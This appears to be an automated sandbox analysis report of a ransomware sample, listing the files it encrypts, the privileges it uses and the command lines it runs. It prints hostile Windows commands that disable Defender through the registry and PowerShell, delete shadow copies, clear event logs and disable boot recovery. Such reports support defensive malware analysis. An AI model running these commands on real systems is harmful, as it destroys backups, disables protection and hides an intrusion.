| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\SETUP.XML.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe
"C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\xG7b_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/864-54-0x000007FEFBCC1000-0x000007FEFBCC3000-memory.dmp
memory/2160-58-0x000007FEF2D70000-0x000007FEF38CD000-memory.dmp
memory/2160-59-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
memory/2160-60-0x0000000002940000-0x0000000002942000-memory.dmp
memory/2160-61-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
memory/2160-63-0x0000000002944000-0x0000000002947000-memory.dmp
memory/2160-62-0x0000000002942000-0x0000000002944000-memory.dmp
memory/2160-64-0x000000001B800000-0x000000001BAFF000-memory.dmp
memory/2160-65-0x000000000294B000-0x000000000296A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b102721d6355040dc3d7ee11dd2255dd |
| SHA1 | f533407d0c30e440bcf0c6b15bced87b26b9be1d |
| SHA256 | dd9233f5e75c8e191c2d7ae218324b349b4911a6594451fa281e33e365658112 |
| SHA512 | 75aa21fb71a0fac205b5c3a04540168c11fe558c36e51cb27b1bc2feb4963b3457c4c38b931d8b583ed3fc67807eeee1b3efce2e6fa2a4d666e30b7c246db78c |
memory/2260-68-0x000007FEF23D0000-0x000007FEF2F2D000-memory.dmp
memory/2260-69-0x000007FEF4840000-0x000007FEF51DD000-memory.dmp
memory/2260-70-0x00000000028C0000-0x00000000028C2000-memory.dmp
memory/2260-71-0x000000001B7B0000-0x000000001BAAF000-memory.dmp
memory/2260-72-0x000007FEF4840000-0x000007FEF51DD000-memory.dmp
memory/2260-74-0x00000000028C2000-0x00000000028C4000-memory.dmp
memory/2260-73-0x00000000028CB000-0x00000000028EA000-memory.dmp
memory/2260-75-0x00000000028C4000-0x00000000028C7000-memory.dmp
C:\xG7b_HOW_TO_DECRYPT.txt
| MD5 | aa414baba021f7fdd6ee55bdcb0c0432 |
| SHA1 | 78362d2ec5cb8bbf597cdd790fabdcb7259f922d |
| SHA256 | c59cbc656a9c03be6da5e0f7af8fec073e5227cb8b4986daf7eb0468cec54faf |
| SHA512 | da33e6a2e561e2b74acd4e24e83a3834a917a167154926a6d24b58b93f6515c4c7ae4a0476baa27876b7990d6fb6e38c7a413bb0c7a7effd56d75ee6fdde73fc |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-20 00:34
Reported
2022-03-20 01:05
Platform
win10v2004-en-20220113
Max time kernel
185s
Max time network
660s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\adovbs.inc | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_CgAAAAoAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_FAAAABQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\adcjavas.inc | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\US_export_policy.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_NAAAADQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\RELEASE-NOTES.html.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_EAAAABAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_CgAAAAoAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_MgAAADIAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_LAAAACwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_DgAAAA4AAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\VERSION.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_JgAAACYAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_FAAAABQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
